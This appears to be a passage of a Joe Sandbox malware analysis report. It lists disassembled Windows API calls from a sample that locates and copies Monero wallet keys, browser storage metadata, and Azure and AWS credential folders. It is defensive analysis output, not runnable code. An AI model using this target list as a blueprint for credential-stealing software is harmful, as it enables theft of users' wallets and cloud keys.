                                  • StrStrA.SHLWAPI(?,00FADBC8), ref: 003586CF
                                  • lstrcpyn.KERNEL32(005793D0,?,00000000), ref: 003586EE
                                  • lstrlen.KERNEL32(?), ref: 00358701
                                  • wsprintfA.USER32 ref: 00358711
                                  • lstrcpy.KERNEL32(?,?), ref: 00358727
                                  • StrStrA.SHLWAPI(?,00FADE50), ref: 00358754
                                  • lstrcpy.KERNEL32(?,005793D0), ref: 003587B4
                                  • StrStrA.SHLWAPI(?,00FADEB0), ref: 003587E1
                                  • lstrcpyn.KERNEL32(005793D0,?,00000000), ref: 00358800
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1425086991.0000000000341000.00000040.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                  • Associated: 00000000.00000002.1425071124.0000000000340000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425086991.0000000000377000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425086991.00000000003CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425086991.00000000003D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425086991.00000000003EF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425086991.0000000000578000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425250911.000000000058A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.000000000058C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.0000000000718000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.00000000007F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.0000000000817000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.0000000000822000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.0000000000830000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425528055.0000000000831000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425647914.00000000009CB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425664538.00000000009CC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_340000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy$lstrcpynlstrlen$wsprintf
                                  • String ID: %s%s
                                  • API String ID: 2672039231-3252725368
                                  • Opcode ID: b88e11256a79d3a4c171c7c4e2c04f478f59f41ef6bd3ee3de3bda0c876f567f
                                  • Instruction ID: 4bb23dc5c974f0f2875fb0222473ad3d27ddcd1324b4ec939e745e139691dbca
                                  • Opcode Fuzzy Hash: b88e11256a79d3a4c171c7c4e2c04f478f59f41ef6bd3ee3de3bda0c876f567f
                                  • Instruction Fuzzy Hash: F8F14E71905114AFCB11DB64ED48AEAB7B9EF98300F148595F90DE7250DF30AE49EBA0
                                  Function 00341F79 Relevance: 54.4, APIs: 36, Instructions: 407stringfileCOMMON
                                  Download Yara Rule
                                  APIs
                                  • lstrcpy.KERNEL32(00000000,0036CFEC), ref: 00341F9F
                                  • lstrlen.KERNEL32(00FA8858), ref: 00341FAE
                                  • lstrcpy.KERNEL32(00000000,?), ref: 00341FDB
                                  • lstrcat.KERNEL32(00000000,?), ref: 00341FE3
                                  • lstrlen.KERNEL32(00371794), ref: 00341FEE
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 0034200E
                                  • lstrcat.KERNEL32(00000000,00371794), ref: 0034201A
                                  • lstrcpy.KERNEL32(00000000,?), ref: 00342042
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 0034204D
                                  • lstrlen.KERNEL32(00371794), ref: 00342058
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00342075
                                  • lstrcat.KERNEL32(00000000,00371794), ref: 00342081
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 003420AC
                                  • lstrlen.KERNEL32(?), ref: 003420E4
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00342104
                                  • lstrcat.KERNEL32(00000000,?), ref: 00342112
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00342139
                                  • lstrlen.KERNEL32(00371794), ref: 0034214B
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 0034216B
                                  • lstrcat.KERNEL32(00000000,00371794), ref: 00342177
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 0034219D
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 003421A8
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 003421D4
                                  • lstrlen.KERNEL32(?), ref: 003421EA
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 0034220A
                                  • lstrcat.KERNEL32(00000000,?), ref: 00342218
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00342242
                                  • lstrcpy.KERNEL32(00000000,0036CFEC), ref: 0034227F
                                  • lstrlen.KERNEL32(00FAC6B0), ref: 0034228D
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 003422B1
                                  • lstrcat.KERNEL32(00000000,00FAC6B0), ref: 003422B9
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 003422F7
                                  • lstrcat.KERNEL32(00000000), ref: 00342304
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 0034232D
                                  • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00342356
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00342382
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 003423BF
                                  • DeleteFileA.KERNEL32(00000000), ref: 003423F7
                                  • FindNextFileA.KERNEL32(00000000,?), ref: 00342444
                                  • FindClose.KERNEL32(00000000), ref: 00342453
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1425086991.0000000000341000.00000040.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                  • Associated: 00000000.00000002.1425071124.0000000000340000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425086991.0000000000377000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425086991.00000000003CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425086991.00000000003D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425086991.00000000003EF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425086991.0000000000578000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425250911.000000000058A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.000000000058C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.0000000000718000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.00000000007F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.0000000000817000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.0000000000822000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.0000000000830000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425528055.0000000000831000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425647914.00000000009CB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425664538.00000000009CC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_340000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy$lstrcat$lstrlen$File$Find$CloseCopyDeleteNext
                                  • String ID:
                                  • API String ID: 2857443207-0
                                  • Opcode ID: b68d978af3199bd93de011edde1d67250be8d50715c4c3e766473f66e8307813
                                  • Instruction ID: 81f805eaa2d3c1c273fc5664a0828af72ad86f9c44433e4874eafb4d1eee2817
                                  • Opcode Fuzzy Hash: b68d978af3199bd93de011edde1d67250be8d50715c4c3e766473f66e8307813
                                  • Instruction Fuzzy Hash: 49E11A31A116169BCB22EF64ED89AAF77F9AF14300F854064F809BF211DB34ED55DBA0
                                  Function 00356410 Relevance: 52.9, APIs: 29, Strings: 1, Instructions: 438stringCOMMON
                                  Download Yara Rule
                                  APIs
                                  • lstrcpy.KERNEL32(00000000,0036CFEC), ref: 00356445
                                  • lstrcpy.KERNEL32(00000000,0036CFEC), ref: 00356480
                                  • SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,?), ref: 003564AA
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 003564E1
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00356506
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 0035650E
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00356537
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1425086991.0000000000341000.00000040.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                  • Associated: 00000000.00000002.1425071124.0000000000340000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425086991.0000000000377000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425086991.00000000003CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425086991.00000000003D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425086991.00000000003EF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425086991.0000000000578000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425250911.000000000058A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.000000000058C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.0000000000718000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.00000000007F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.0000000000817000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.0000000000822000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.0000000000830000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425528055.0000000000831000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425647914.00000000009CB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425664538.00000000009CC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_340000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy$FolderPathlstrcat
                                  • String ID: \..\
                                  • API String ID: 2938889746-4220915743
                                  • Opcode ID: 473dd85c6413c6b1b4ba84794064b1546fa0906419cc40fc56d7a1f0c0340905
                                  • Instruction ID: 019095adb9053766ecc3ad00fc11c603707f9b90c7ec8a79bb6fa6c1be677fa4
                                  • Opcode Fuzzy Hash: 473dd85c6413c6b1b4ba84794064b1546fa0906419cc40fc56d7a1f0c0340905
                                  • Instruction Fuzzy Hash: A8F16C709112069BCB23AF64DC4AEAF77F8AF44301F854568FC55AB261DB34EC59CBA0
                                  Function 00354370 Relevance: 49.3, APIs: 26, Strings: 2, Instructions: 334stringCOMMON
                                  Download Yara Rule
                                  APIs
                                  • lstrcpy.KERNEL32(00000000,0036CFEC), ref: 003543A3
                                  • lstrcpy.KERNEL32(00000000,0036CFEC), ref: 003543D6
                                  • lstrcpy.KERNEL32(00000000,?), ref: 003543FE
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 00354409
                                  • lstrlen.KERNEL32(\storage\default\), ref: 00354414
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00354431
                                  • lstrcat.KERNEL32(00000000,\storage\default\), ref: 0035443D
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00354466
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 00354471
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00354498
                                  • lstrcpy.KERNEL32(00000000,?), ref: 003544D7
                                  • lstrcat.KERNEL32(00000000,?), ref: 003544DF
                                  • lstrlen.KERNEL32(00371794), ref: 003544EA
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00354507
                                  • lstrcat.KERNEL32(00000000,00371794), ref: 00354513
                                  • lstrlen.KERNEL32(.metadata-v2), ref: 0035451E
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 0035453B
                                  • lstrcat.KERNEL32(00000000,.metadata-v2), ref: 00354547
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 0035456E
                                  • lstrcpy.KERNEL32(00000000,?), ref: 003545A0
                                  • GetFileAttributesA.KERNEL32(00000000), ref: 003545A7
                                  • lstrcpy.KERNEL32(00000000,?), ref: 00354601
                                  • lstrcpy.KERNEL32(00000000,?), ref: 0035462A
                                  • lstrcpy.KERNEL32(00000000,?), ref: 00354653
                                  • lstrcpy.KERNEL32(00000000,?), ref: 0035467B
                                  • lstrcpy.KERNEL32(00000000,0036CFEC), ref: 003546AF
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1425086991.0000000000341000.00000040.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                  • Associated: 00000000.00000002.1425071124.0000000000340000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425086991.0000000000377000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425086991.00000000003CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425086991.00000000003D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425086991.00000000003EF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425086991.0000000000578000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425250911.000000000058A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.000000000058C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.0000000000718000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.00000000007F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.0000000000817000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.0000000000822000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.0000000000830000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425528055.0000000000831000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425647914.00000000009CB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425664538.00000000009CC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_340000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy$lstrcat$lstrlen$AttributesFile
                                  • String ID: .metadata-v2$\storage\default\
                                  • API String ID: 1033685851-762053450
                                  • Opcode ID: ff70f295fe52079f4fcbe2dde9f19ecba497e3b8cc3c68b7c3e48ddb7985cc13
                                  • Instruction ID: a8a3bb8376f2ecbeabeaaea3d54e102285aff2541201ba045502757059bcd6c1
                                  • Opcode Fuzzy Hash: ff70f295fe52079f4fcbe2dde9f19ecba497e3b8cc3c68b7c3e48ddb7985cc13
                                  • Instruction Fuzzy Hash: 23B18D71A112069BCB27AF74DC49EAF77E8AF14305F454024FC49EB261DB34EC999BA0
                                  Function 003557A0 Relevance: 45.5, APIs: 30, Instructions: 486stringCOMMON
                                  Download Yara Rule
                                  APIs
                                  • lstrcpy.KERNEL32(00000000,0036CFEC), ref: 003557D5
                                  • SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 00355804
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00355835
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 0035585D
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 00355868
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00355890
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 003558C8
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 003558D3
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 003558F8
                                  • lstrcpy.KERNEL32(00000000,0036CFEC), ref: 0035592E
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00355956
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 00355961
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00355988
                                  • lstrlen.KERNEL32(00371794), ref: 0035599A
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 003559B9
                                  • lstrcat.KERNEL32(00000000,00371794), ref: 003559C5
                                  • lstrlen.KERNEL32(00FAC578), ref: 003559D4
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 003559F7
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 00355A02
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00355A2C
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00355A58
                                  • GetFileAttributesA.KERNEL32(00000000), ref: 00355A5F
                                  • lstrcpy.KERNEL32(00000000,?), ref: 00355AB7
                                  • lstrcpy.KERNEL32(00000000,?), ref: 00355B2D
                                  • lstrcpy.KERNEL32(00000000,?), ref: 00355B56
                                  • lstrcpy.KERNEL32(00000000,?), ref: 00355B89
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00355BB5
                                  • lstrcpy.KERNEL32(00000000,0036CFEC), ref: 00355BEF
                                  • lstrcpy.KERNEL32(00000000,?), ref: 00355C4C
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00355C70
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1425086991.0000000000341000.00000040.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                  • Associated: 00000000.00000002.1425071124.0000000000340000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425086991.0000000000377000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425086991.00000000003CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425086991.00000000003D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425086991.00000000003EF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425086991.0000000000578000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425250911.000000000058A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.000000000058C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.0000000000718000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.00000000007F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.0000000000817000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.0000000000822000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.0000000000830000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425528055.0000000000831000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425647914.00000000009CB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425664538.00000000009CC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_340000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy$lstrcat$lstrlen$AttributesFileFolderPath
                                  • String ID:
                                  • API String ID: 2428362635-0
                                  • Opcode ID: bc0aa8d43265707369c574b4cf5ee503dc2706daa952672a23977eb636616825
                                  • Instruction ID: 17a305b355640a5282dc0c5fa299845cd4224e2f9ec5f7b7d3febe8e0465f36e
                                  • Opcode Fuzzy Hash: bc0aa8d43265707369c574b4cf5ee503dc2706daa952672a23977eb636616825
                                  • Instruction Fuzzy Hash: 6202B271A116059BCB23EF68D899EAF7BF5AF54301F454128FC45AB260DB34EC49CBA0
                                  Function 00341190 Relevance: 42.3, APIs: 22, Strings: 2, Instructions: 280stringfileCOMMON
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 00341120: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00341135
                                    • Part of subcall function 00341120: RtlAllocateHeap.NTDLL(00000000), ref: 0034113C
                                    • Part of subcall function 00341120: RegOpenKeyExA.ADVAPI32(80000001,SOFTWARE\monero-project\monero-core,00000000,00020119,?), ref: 00341159
                                    • Part of subcall function 00341120: RegQueryValueExA.ADVAPI32(?,wallet_path,00000000,00000000,00000000,000000FF), ref: 00341173
                                    • Part of subcall function 00341120: RegCloseKey.ADVAPI32(?), ref: 0034117D
                                  • lstrcat.KERNEL32(?,00000000), ref: 003411C0
                                  • lstrlen.KERNEL32(?), ref: 003411CD
                                  • lstrcat.KERNEL32(?,.keys), ref: 003411E8
                                  • lstrcpy.KERNEL32(00000000,0036CFEC), ref: 0034121F
                                  • lstrlen.KERNEL32(00FA8858), ref: 0034122D
                                  • lstrcpy.KERNEL32(00000000,?), ref: 00341251
                                  • lstrcat.KERNEL32(00000000,00FA8858), ref: 00341259
                                  • lstrlen.KERNEL32(\Monero\wallet.keys), ref: 00341264
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00341288
                                  • lstrcat.KERNEL32(00000000,\Monero\wallet.keys), ref: 00341294
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 003412BA
                                  • lstrcpy.KERNEL32(00000000,0036CFEC), ref: 003412FF
                                  • lstrlen.KERNEL32(00FAC6B0), ref: 0034130E
                                  • lstrcpy.KERNEL32(00000000,?), ref: 00341335
                                  • lstrcat.KERNEL32(00000000,?), ref: 0034133D
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00341378
                                  • lstrcat.KERNEL32(00000000), ref: 00341385
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 003413AC
                                  • CopyFileA.KERNEL32(?,?,00000001), ref: 003413D5
                                  • lstrcpy.KERNEL32(00000000,?), ref: 00341401
                                  • lstrcpy.KERNEL32(00000000,?), ref: 0034143D
                                    • Part of subcall function 0035EDE0: lstrcpy.KERNEL32(00000000,?), ref: 0035EE12
                                  • DeleteFileA.KERNEL32(?), ref: 00341471
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1425086991.0000000000341000.00000040.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                  • Associated: 00000000.00000002.1425071124.0000000000340000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425086991.0000000000377000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425086991.00000000003CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425086991.00000000003D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425086991.00000000003EF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425086991.0000000000578000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425250911.000000000058A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.000000000058C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.0000000000718000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.00000000007F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.0000000000817000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.0000000000822000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.0000000000830000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425528055.0000000000831000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425647914.00000000009CB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425664538.00000000009CC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_340000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy$lstrcat$lstrlen$FileHeap$AllocateCloseCopyDeleteOpenProcessQueryValue
                                  • String ID: .keys$\Monero\wallet.keys
                                  • API String ID: 2881711868-3586502688
                                  • Opcode ID: 6a41228ec8bcb6b28c2794f32014a57f10854a91bb348b36950c596f6b92dfca
                                  • Instruction ID: 4892a6496a01b4ae195400583207d81bbb174e2661b2b651ed3d40fe1e1925dc
                                  • Opcode Fuzzy Hash: 6a41228ec8bcb6b28c2794f32014a57f10854a91bb348b36950c596f6b92dfca
                                  • Instruction Fuzzy Hash: 5BA16071A10606ABCB22EF64DC89AAF77F9AF54300F454424F909EF251DB30ED959BA0
                                  Function 0035E720 Relevance: 42.2, APIs: 16, Strings: 8, Instructions: 199stringCOMMON
                                  Download Yara Rule
                                  APIs
                                  • memset.MSVCRT ref: 0035E740
                                  • SHGetFolderPathA.SHELL32(00000000,00000028,00000000,00000000,?), ref: 0035E769
                                  • lstrcpy.KERNEL32(00000000,?), ref: 0035E79F
                                  • lstrcat.KERNEL32(?,00000000), ref: 0035E7AD
                                  • lstrcat.KERNEL32(?,\.azure\), ref: 0035E7C6
                                  • memset.MSVCRT ref: 0035E805
                                  • SHGetFolderPathA.SHELL32(00000000,00000028,00000000,00000000,?), ref: 0035E82D
                                  • lstrcpy.KERNEL32(00000000,?), ref: 0035E85F
                                  • lstrcat.KERNEL32(?,00000000), ref: 0035E86D
                                  • lstrcat.KERNEL32(?,\.aws\), ref: 0035E886
                                  • memset.MSVCRT ref: 0035E8C5
                                  • SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 0035E8F1
                                  • lstrcpy.KERNEL32(00000000,?), ref: 0035E920
                                  • lstrcat.KERNEL32(?,00000000), ref: 0035E92E
                                  • lstrcat.KERNEL32(?,\.IdentityService\), ref: 0035E947
                                  • memset.MSVCRT ref: 0035E986
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1425086991.0000000000341000.00000040.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                  • Associated: 00000000.00000002.1425071124.0000000000340000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425086991.0000000000377000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425086991.00000000003CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425086991.00000000003D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425086991.00000000003EF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425086991.0000000000578000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425250911.000000000058A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.000000000058C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.0000000000718000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.00000000007F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.0000000000817000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.0000000000822000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.0000000000830000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425528055.0000000000831000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425647914.00000000009CB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425664538.00000000009CC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_340000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcat$memset$FolderPathlstrcpy
                                  • String ID: *.*$Azure\.IdentityService$Azure\.aws$Azure\.azure$\.IdentityService\$\.aws\$\.azure\$msal.cache
                                  • API String ID: 4067350539-3645552435
